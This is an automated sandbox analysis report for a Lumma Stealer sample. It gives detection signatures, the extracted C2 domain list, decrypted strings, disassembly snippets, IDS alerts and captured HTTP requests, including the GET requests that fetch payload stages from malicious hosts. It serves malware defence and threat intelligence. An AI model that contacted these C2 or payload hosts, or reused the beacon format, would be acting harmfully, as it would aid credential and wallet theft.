Windows Analysis Report

Overview

General Information

Analysis ID: 1579348
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Found malware configuration
Source: 8.2.powershell.exe.400000.0.raw.unpack Malware Configuration Extractor: LummaC {"C2 url": ["surmisehotte.click", "aspecteirs.lat", "energyaffai.lat", "crosshuaht.lat", "discokeyus.lat", "grannyejh.lat", "sustainskelet.lat", "rapeflowwj.lat", "necklacebudi.lat"], "Build id": "yJEcaG--singl6"}
Sample uses string decryption to hide its real strings
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: rapeflowwj.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: crosshuaht.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: sustainskelet.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: aspecteirs.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: energyaffai.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: necklacebudi.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: discokeyus.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: grannyejh.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: surmisehotte.click
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: TeslaBrowser/5.5
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: - Screen Resoluton:
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: - Physical Installed Memory:
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: Workgroup: -
Source: 8.2.powershell.exe.400000.0.raw.unpack String decryptor: yJEcaG--singl6
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00415799 CryptUnprotectData, 8_2_00415799
Source: unknown HTTPS traffic detected: 172.67.223.7:443 -> 192.168.11.20:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.37.173:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49776 version: TLS 1.2
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: number of queries: 1002
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 06C774CBh 6_2_06C773B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 06C75276h 6_2_06C7520E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 06C75276h 6_2_06C75210
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 06C774CBh 6_2_06C773A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 06C74C29h 6_2_06C74851
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 06C74C29h 6_2_06C74860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 06C75276h 6_2_06C75416
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 06C774CBh 6_2_06C77574
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh] 8_2_00423860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov edx, ecx 8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh 8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh 8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then test eax, eax 8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov byte ptr [esi], al 8_2_0042DA53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [ebx], ax 8_2_0041B2E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h] 8_2_00417DEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ecx, eax 8_2_00409580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [ebp+00h], ax 8_2_00409580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then xor edi, edi 8_2_0041759F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ecx, eax 8_2_0043AEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h] 8_2_0043C767
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h] 8_2_0041E7C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov esi, eax 8_2_00415799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ecx, eax 8_2_00415799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp eax 8_2_0042984F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0041682D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] 8_2_0041682D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h] 8_2_0041682D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [ecx], bp 8_2_0041D83A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then push C0BFD6CCh 8_2_00423086
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then push C0BFD6CCh 8_2_00423086
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then add ebp, dword ptr [esp+0Ch] 8_2_0042B170
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov eax, dword ptr [esp+00000080h] 8_2_004179C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h 8_2_0043B1D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ebx, eax 8_2_0043B1D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [ecx], dx 8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ecx, dword ptr [ebp-20h] 8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ebx, eax 8_2_00405990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ebp, eax 8_2_00405990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ebx, esi 8_2_00422190
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [ebx], cx 8_2_00422190
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 8_2_00422190
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov byte ptr [edi], cl 8_2_0042CA49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh] 8_2_00416263
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh] 8_2_00415220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then push esi 8_2_00427AD3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov byte ptr [edi], cl 8_2_0042CAD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then push ebx 8_2_0043CA93
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0041CB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [esi], cx 8_2_0041CB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_00428B61
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov byte ptr [edi], cl 8_2_0042CB11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov byte ptr [edi], cl 8_2_0042CB22
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax] 8_2_0043F330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ebx, eax 8_2_0040DBD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ebx, eax 8_2_0040DBD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] 8_2_00417380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h 8_2_0041D380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then cmp al, 2Eh 8_2_00426B95
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 8_2_00435450
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] 8_2_00417380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then push 00000000h 8_2_00429C2B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [ecx], dx 8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ecx, dword ptr [ebp-20h] 8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 8_2_004074F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 8_2_004074F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] 8_2_0043ECA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h 8_2_004385E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp eax 8_2_004385E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp dword ptr [0044450Ch] 8_2_00418591
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov eax, dword ptr [ebp-68h] 8_2_00428D93
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov eax, dword ptr [0044473Ch] 8_2_0041C653
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov edx, ebp 8_2_00425E70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp dword ptr [004455F4h] 8_2_00425E30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then xor byte ptr [esp+eax+17h], al 8_2_00408F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov byte ptr [edi], bl 8_2_00408F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 8_2_0042A700
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then lea edx, dword ptr [ecx+01h] 8_2_0040B70C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov byte ptr [esi], al 8_2_0041BF14
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h] 8_2_00419F30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx eax, word ptr [edx] 8_2_004197C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [edi], dx 8_2_004197C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov word ptr [esi], cx 8_2_004197C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov ecx, ebx 8_2_0042DFE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp ecx 8_2_0040BFFD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] 8_2_0043EFB0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 35MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49757 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49757 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49756 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49756 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49774 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49776 -> 104.21.96.1:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: surmisehotte.click
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /singl6.vsdx HTTP/1.1Host: journal.liveview.pwConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 172.67.223.7 172.67.223.7
Source: Joe Sandbox View IP Address: 104.21.96.1 104.21.96.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49756 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49757 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49773 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49775 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49771 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49770 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49772 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49776 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49774 -> 104.21.96.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 23.50.112.50
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.237
Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown TCP traffic detected without corresponding DNS query: 172.217.165.195
Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown TCP traffic detected without corresponding DNS query: 172.217.165.195
Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: global traffic HTTP traffic detected: GET /singl6.mp4 HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: savecoupons.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /singl6.vsdx HTTP/1.1Host: journal.liveview.pwConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
